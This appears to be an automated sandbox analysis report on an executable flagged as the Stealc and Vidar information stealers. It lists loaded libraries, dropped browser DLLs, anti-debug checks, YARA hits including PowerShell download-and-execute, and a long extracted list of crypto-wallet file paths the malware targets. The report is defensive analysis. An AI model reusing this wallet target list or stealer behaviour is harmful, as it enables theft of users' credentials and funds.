Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 9JtNIXVedn.exe, 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 9JtNIXVedn.exe, 00000000.00000003.1566125167.0000000021CD9000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000003.1575489765.0000000021CCD000.00000004.00000020.00020000.00000000.sdmp, CGCAKKKEGCAKJKFIIEGI.0.dr, EGDBFIIECBGDGDGDHCAK.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: 9JtNIXVedn.exe	String found in binary or memory: ;application/vnd.adobe.air-application-installer-package+zip
Source: 9JtNIXVedn.exe	String found in binary or memory: application/vnd.groove-help
Source: 9JtNIXVedn.exe	String found in binary or memory: "application/x-install-instructions
Source: 9JtNIXVedn.exe	String found in binary or memory: NATS-SEFI-ADD
Source: 9JtNIXVedn.exe	String found in binary or memory: NATS-DANO-ADD
Source: 9JtNIXVedn.exe	String found in binary or memory: JIS_C6229-1984-b-add
Source: 9JtNIXVedn.exe	String found in binary or memory: jp-ocr-b-add
Source: 9JtNIXVedn.exe	String found in binary or memory: JIS_C6229-1984-hand-add
Source: 9JtNIXVedn.exe	String found in binary or memory: jp-ocr-hand-add
Source: 9JtNIXVedn.exe	String found in binary or memory: ISO_6937-2-add

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: 9JtNIXVedn.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 9JtNIXVedn.exe

Static file information: File size 10183264 > 1048576

Source: 9JtNIXVedn.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x577800
Source: 9JtNIXVedn.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x38a000

Source: 9JtNIXVedn.exe

Static PE information: More than 200 imports for user32.dll

Source: 9JtNIXVedn.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: mozglue.pdbP source: 9JtNIXVedn.exe, 00000000.00000002.1691259038.000000006FF1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: 9JtNIXVedn.exe, 00000000.00000002.1691259038.000000006FF1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

PE file contains sections with non-standard names

Source: 9JtNIXVedn.exe	Static PE information: section name: .didata
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg

Drops PE files

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Code function: 0_2_6CDCEBF0 PR_GetNumberOfProcessors,GetSystemInfo,

0_2_6CDCEBF0

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior

Source: CBFBGCGI.0.dr	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: CBFBGCGI.0.dr	Binary or memory string: global block list test formVMware20,11696497155
Source: CBFBGCGI.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: CBFBGCGI.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CBFBGCGI.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: CBFBGCGI.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: CBFBGCGI.0.dr	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: CBFBGCGI.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: CBFBGCGI.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: CBFBGCGI.0.dr	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: CBFBGCGI.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: CBFBGCGI.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: CBFBGCGI.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: CBFBGCGI.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: CBFBGCGI.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: CBFBGCGI.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: CBFBGCGI.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: CBFBGCGI.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: CBFBGCGI.0.dr	Binary or memory string: AMC password management pageVMware20,11696497155
Source: CBFBGCGI.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: CBFBGCGI.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: CBFBGCGI.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: CBFBGCGI.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: CBFBGCGI.0.dr	Binary or memory string: discord.comVMware20,11696497155f
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWI
Source: CBFBGCGI.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: CBFBGCGI.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: CBFBGCGI.0.dr	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: CBFBGCGI.0.dr	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: CBFBGCGI.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: CBFBGCGI.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: CBFBGCGI.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Code function: 0_2_6CE9AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CE9AC62

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Code function: 0_2_6CE9AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CE9AC62

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 9JtNIXVedn.exe PID: 7776, type: MEMORYSTR

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Code function: 0_2_6CEE4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6CEE4760

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Code function: 0_2_6CDC1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

0_2_6CDC1C30

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Code function: 0_2_6CE9AE71 cpuid

0_2_6CE9AE71

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Code function: 0_2_6CE9A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CE9A8DC

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Code function: 0_2_6CDE8390 NSS_GetVersion,

0_2_6CDE8390

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9JtNIXVedn.exe PID: 7776, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: 9JtNIXVedn.exe PID: 7776, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
